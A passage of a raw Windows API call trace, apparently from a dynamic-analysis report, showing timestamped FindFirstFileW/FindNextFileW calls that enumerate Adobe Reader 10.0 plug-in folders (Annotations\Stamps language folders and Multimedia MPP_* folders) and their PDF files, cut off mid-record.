FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1c005, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.722] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.722] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff28600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff28600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KOR", cAlternateFileName="")) returned 1 [0058.722] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff28600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff28600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.723] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff28600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff28600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.723] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff28600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x12b04, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.723] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff28600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xeac1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hanko.pdf", cAlternateFileName="")) returned 1 [0058.723] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff28600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xd074, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.723] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff28600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x24f7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.723] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff28600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x24f7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.723] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.724] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7feb61e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7fedc340, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NLD", cAlternateFileName="")) returned 1 [0058.724] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7feb61e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7fedc340, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.725] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7feb61e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7fedc340, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.725] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xff3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.725] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9542, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.725] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x180e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.725] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x180e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.725] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.725] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff28600, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff28600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff28600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NOR", cAlternateFileName="")) returned 1 [0058.726] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff28600, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff28600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff28600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.727] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff28600, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff28600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff28600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.728] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.728] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806bec20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x806e4d80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x806e4d80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.731] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.732] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff748c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff748c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff748c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.733] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.733] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80698ac0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x806bec20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x806bec20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.738] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.739] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80672960, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80698ac0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80698ac0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.742] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.743] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8064c800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80672960, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80672960, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.746] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.747] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8064c800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8064c800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8064c800, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.750] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.751] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7f804400, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7f804400, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.752] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.752] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff024a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.753] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.753] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806266a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8064c800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8064c800, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.757] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.758] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80600540, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x806266a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x806266a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.761] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.762] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.762] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.762] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d853f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d853f20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.765] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d87a080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d87a080, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.772] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.773] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d853f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d853f20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.775] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.775] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d853f20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d853f20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d853f20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.776] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.776] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d82ddc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.777] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.777] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d82ddc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.778] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.778] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d82ddc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d82ddc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.779] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.779] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d807c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.780] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.781] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d807c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.782] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.782] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d807c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d807c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0360 [0058.783] FindClose (in: hFindFile=0x6a0360 | out: hFindFile=0x6a0360) returned 1 [0058.783] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d7e1b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d7e1b00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, 